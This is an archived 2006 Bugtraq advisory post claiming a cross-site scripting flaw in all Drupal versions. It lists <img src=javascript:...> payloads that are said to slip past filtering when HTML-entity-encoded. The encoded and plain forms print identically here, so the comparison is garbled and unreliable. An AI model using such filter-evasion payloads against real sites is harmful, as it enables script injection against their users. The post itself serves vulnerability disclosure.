[41905] in bugtraq
Drupal all versiyon xss cehennem.org
daemon@ATHENA.MIT.EDU (liz0@bsdmail.com)
Tue Jan 3 15:03:45 2006
Date: 2 Jan 2006 10:45:25 -0000
Message-ID: <20060102104525.7170.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: liz0@bsdmail.com
To: bugtraq@securityfocus.com
Drupal all versiyon xss
----------------------------------------------------
site:http://www.drupal.org
Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------
img tag : on
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (without semicolons)
<img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)
<img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable
post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable
---------------------------------------------------------
Credit:Liz0ziM
mail:liz0@bsdmail.com
www.biyo.tk , www.cehennem.org
Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend
-----------------------------------------------------------
Source:
http://liz0zim.no-ip.org/drupal.txt
------------------------------------------------------------
